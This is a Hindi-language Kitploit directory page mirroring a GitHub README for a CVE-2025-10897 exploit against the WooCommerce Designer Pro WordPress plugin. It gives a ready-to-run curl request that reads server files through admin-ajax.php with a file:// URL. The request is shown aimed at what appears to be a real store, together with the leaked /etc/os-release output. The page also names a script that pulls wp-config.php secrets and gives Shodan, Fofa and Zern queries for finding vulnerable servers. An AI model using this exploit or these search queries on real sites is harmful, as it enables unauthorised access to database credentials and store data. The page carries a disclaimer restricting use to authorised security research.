Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-10897 — WooCommerce Designer Pro <= 1.9.28 - बिना प्रमाणीकरण के मनमानी फ़ाइल पढ़ना | Kitploit
उपकरण/GitHubGitHub/error-inside/cve-2025-10897
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHuberror-inside/cve-2025-10897

CVE-2025-10897

WooCommerce Designer Pro <= 1.9.28 - बिना प्रमाणीकरण के मनमानी फ़ाइल पढ़ना

रिपॉजिटरी देखें
19 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-10897

Python CVSS License Educational

WooCommerce वर्डप्रेस के लिए एक ओपन-सोर्स ई-कॉमर्स प्लगइन है जो वेबसाइटों को ऑनलाइन स्टोर में बदल देता है। WooCommerce Designer Pro JMA Plugins द्वारा विकसित एक वर्डप्रेस प्लगइन है जो ग्राहकों को WooCommerce स्टोर पर सीधे उत्पादों को डिज़ाइन और कस्टमाइज़ करने में सक्षम बनाता है।

महत्वपूर्ण: WooCommerce और WooCommerce Designer Pro पूरी तरह से अलग हैं।

WooCommerce Designer Pro बिज़नेस कार्ड, पोस्टकार्ड, फ़्लायर्स, पोस्टर, टी-शर्ट, स्टिकर और अन्य प्रिंट योग्य सामग्री बनाने का समर्थन करता है, जिसमें CMYK रंग समर्थन, PDF जनरेशन और कैनवास-आधारित डिज़ाइन इंटरफ़ेस जैसी सुविधाएँ शामिल हैं। प्लगइन खरीद से पहले वास्तविक समय में उत्पाद कस्टमाइज़ेशन की अनुमति देने के लिए WooCommerce के साथ एकीकृत होता है, जिससे यह ऑनलाइन प्रिंटिंग व्यवसायों और कस्टम मर्चेंडाइज़ स्टोर के लिए उपयुक्त बनता है।

CVE-2025-10897, WooCommerce Designer Pro के 1.9.28 तक के संस्करणों में एक बिना प्रमाणीकरण वाला मनमाना फ़ाइल पठन है (CWE-22)। एक हमलावर action=wcdp_convert_resource_cmyk और /etc/passwd या wp-config.php जैसी सर्वर फ़ाइलों की ओर इशारा करते हुए file:// URL के साथ POST /wp-admin/admin-ajax.php भेजता है। प्लगइन JSON प्रतिक्रिया में फ़ाइल की सामग्री लौटाता है। इससे बिना किसी WordPress खाते के wp-config.php से डेटाबेस पासवर्ड और अन्य रहस्य लीक हो सकते हैं।

PoC

अनुरोध

root@kitploit:~
curl -sk -X POST 'https://www.procolorprints.ca/wp-admin/admin-ajax.php' \
  -H 'User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)' \
  -H 'Content-Type: application/x-www-form-urlencoded' \
  -H 'Accept: */*' \
  -H 'Connection: close' \
  -d 'action=wcdp_convert_resource_cmyk&url=file:///etc/os-release'

प्रतिक्रिया

root@kitploit:~
{"string":"data:image\/jpg;base64,TkFNRT0iQWxtYUxpbnV4IgpWRVJTSU9OPSI5LjggKE9saXZlIEphZ3VhcikiCklEPSJhbG1hbGludXgiCklEX0xJS0U9InJoZWwgY2VudG9zIGZlZG9yYSIKVkVSU0lPTl9JRD0iOS44IgpQTEFURk9STV9JRD0icGxhdGZvcm06ZWw5IgpQUkVUVFlfTkFNRT0iQWxtYUxpbnV4IDkuOCAoT2xpdmUgSmFndWFyKSIKQU5TSV9DT0xPUj0iMDszNCIKTE9HTz0iZmVkb3JhLWxvZ28taWNvbiIKQ1BFX05BTUU9ImNwZTovbzphbG1hbGludXg6YWxtYWxpbnV4Ojk6OmJhc2VvcyIKSE9NRV9VUkw9Imh0dHBzOi8vYWxtYWxpbnV4Lm9yZy8iCkRPQ1VNRU5UQVRJT05fVVJMPSJodHRwczovL3dpa2kuYWxtYWxpbnV4Lm9yZy8iCkJVR19SRVBPUlRfVVJMPSJodHRwczovL2J1Z3MuYWxtYWxpbnV4Lm9yZy8iCgpBTE1BTElOVVhfTUFOVElTQlRfUFJPSkVDVD0iQWxtYUxpbnV4LTkiCkFMTUFMSU5VWF9NQU5USVNCVF9QUk9KRUNUX1ZFUlNJT049IjkuOCIKUkVESEFUX1NVUFBPUlRfUFJPRFVDVD0iQWxtYUxpbnV4IgpSRURIQVRfU1VQUE9SVF9QUk9EVUNUX1ZFUlNJT049IjkuOCIKU1VQUE9SVF9FTkQ9MjAzMi0wNi0wMQo=","success":true}

Base64 डिकोड की गई प्रतिक्रिया:

root@kitploit:~
NAME="AlmaLinux"
VERSION="9.8 (Olive Jaguar)"
ID="almalinux"
ID_LIKE="rhel centos fedora"
VERSION_ID="9.8"
PLATFORM_ID="platform:el9"
PRETTY_NAME="AlmaLinux 9.8 (Olive Jaguar)"
ANSI_COLOR="0;34"
LOGO="fedora-logo-icon"
CPE_NAME="cpe:/o:almalinux:almalinux:9::baseos"
HOME_URL="https://almalinux.org/"
DOCUMENTATION_URL="https://wiki.almalinux.org/"
BUG_REPORT_URL="https://bugs.almalinux.org/"

ALMALINUX_MANTISBT_PROJECT="AlmaLinux-9"
ALMALINUX_MANTISBT_PROJECT_VERSION="9.8"
REDHAT_SUPPORT_PRODUCT="AlmaLinux"
REDHAT_SUPPORT_PRODUCT_VERSION="9.8"
SUPPORT_END=2032-06-01

उपयोग

root@kitploit:~
python CVE-2025-10897-X7.py

नोट: हमारा PoC स्क्रिप्ट wp-config.php प्राप्त करने का प्रयास करता है, लेकिन लक्ष्य पर WordPress /var/www से भिन्न स्थान पर स्थापित हो सकता है।

कमजोर सर्वरों की खोज के लिए तर्क

  • Zern : body:"wc-designer-pro"
  • Fofa : body="wc-designer-pro"
  • Shodan : http.body:"wc-designer-pro"

संसाधन

  • OpenCVE - WooCommerce Designer Pro <= 1.9.28 बिना प्रमाणीकरण के मनमाना फ़ाइल पठन
  • NIST - CVE-2025-10897 विवरण
  • WooCommerce होमपेज
  • WooCommerce Designer Pro - आधिकारिक डेवलपर वेबसाइट
  • WooCommerce Designer Pro - आधिकारिक मार्केटप्लेस
  • Nuclei Templated - CVE-2025-10897

अस्वीकरण

यह रिपॉजिटरी और इसकी सामग्री केवल वैध सुरक्षा अनुसंधान, अधिकृत पेनिट्रेशन परीक्षण, शैक्षिक अध्ययन और रक्षात्मक उद्देश्यों के लिए प्रदान की जाती है। इस सामग्री तक पहुँचने या इसका उपयोग करने से, आप यह सुनिश्चित करने की पूर्ण ज़िम्मेदारी स्वीकार करते हैं कि आपकी गतिविधियाँ सभी लागू कानूनों का अनुपालन करती हैं और आपने किसी भी ऐसी प्रणाली के विरुद्ध इन तकनीकों का परीक्षण या अनुप्रयोग करने से पहले उचित अधिकार प्राप्त कर लिया है जो आपके स्वामित्व में नहीं है।

इस परियोजना के लेखक और अनुरक्षक इस जानकारी के अनुप्रयोग से उत्पन्न किसी भी क्षति, कानूनी परिणाम या दुरुपयोग के लिए कोई दायित्व नहीं लेते हैं। अनधिकृत पहुँच, दुर्भावनापूर्ण गतिविधि या अवैध उद्देश्यों के लिए कोई भी उपयोग स्पष्ट रूप से निषिद्ध और असमर्थित है।

जिम्मेदारी से उपयोग करें। कानूनी बने रहें। केवल उन्हीं चीज़ों का परीक्षण करें जो आपके स्वामित्व में हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है।

लेखक

  • ErrorInside // SCT

लाइसेंस

SCT-PL

टूल डाउनलोड करें